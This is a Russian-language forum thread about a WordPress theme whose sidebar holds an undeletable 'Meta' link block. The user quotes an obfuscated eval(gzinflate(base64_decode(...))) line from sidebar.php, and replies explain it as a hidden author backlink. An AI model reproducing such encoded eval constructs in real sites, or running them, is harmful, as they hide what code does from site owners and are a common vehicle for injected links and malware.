Проблема с сайдбаром.

Здравствуйте!

Столкнулся с такой проблемой:
У меня в сайдбаре находится вот такой блок:

Meta:
* RSS
* Comments RSS
* WordPress Themes

Я захотел его убрать, но не тут то было. Виджеты если вставляю, исчезают все блоки которые прописаны в sidebar.php (как обычно), кроме этого блока(Meta).
В файле sidebar.php решил найти эту запись и удалить. Там этого нет.

Единственое меня смущает вот такая запись в sidebar.php:
<?php eval(gzinflate(base64_decode(‘tVLBasMwDD23XyFySXZozXrcXPew8y5NYceQNEotcGxjOwv9+2lJs0EZ9DSDkfT8JD0ZHdR6tZKGlNQ79Y6ploIdxlZyMJOdX2vQAbt9Jg9ee2iMu5DtXJGHGHfVEEz+9AoHlUGiZHChVVjk5dW2dK4TQtIUIRJ7QyR7gWNZ3rLUL13WTROWKkesjblCSb03CEslcjZTnCzFN1fNNTjgy0ofSz67vkebYvVQ+0kjGJYeEyxJkBywKPAuckD27yneFvY/jKNT8i9CjOO4HX3S2GPsAuKWFYqfGT5caH3AGOE0MTJ1j9x1mKSPvup5BYpJwrQDYl6CmQi3c0PZaekTqN1nkVps6vC8aVzifxCMM+HOzmbqtIYv’)));?>

При удалении этой строчки, исчезает полностью весь сайдбар.
В общем перекопал все файлы темы, нигде вообще не встречается в коде слово Meta.

Подскажите, пожалуйста, может кто сталкивался с этим?

В принципе, можно было воспользоваться поиском, потому как подобная тема обсуждалась не один раз.

По опыту, это либо авторская защита шаблона, либо ссылка на ресурсы автора. Такое я наблюдал однажды в футере одной темы, сделано это было как сылка на сайт автора темы. Да, при удалении поганился весь футер, но после плясок с бубнами, я получил желаемый результат.

Про виджеты я вам не смогу помочь, потому что принципиально ими не пользуюсь, не люблю. Во-первых слишком хлопотно, когда быстрее все сделать руками если немного варит голова и есть знания по HTML и CSS. Лично я за использование шаблона без виджетов, в дальнейшем снимает массу проблем и вопросов.

Вы правы, это ссылка на ресурс WordPress Themes. Где я искачал эту тему.
Я знаю что такое HTML и CSS, но минусов в том чтобы использовать виджеты я вообще не вижу.

А по теме вопроса вы мне помогли конечно, спасибо)
Поиском воспользовался, что то не нашел ничего, может ссылку подскажите?

Все я нашел решение этой проблемы, вот здесь: http://forum.maxsite.org/viewtopic.php?id=4537&p=1

Anonymous
Отправить
Ответ на: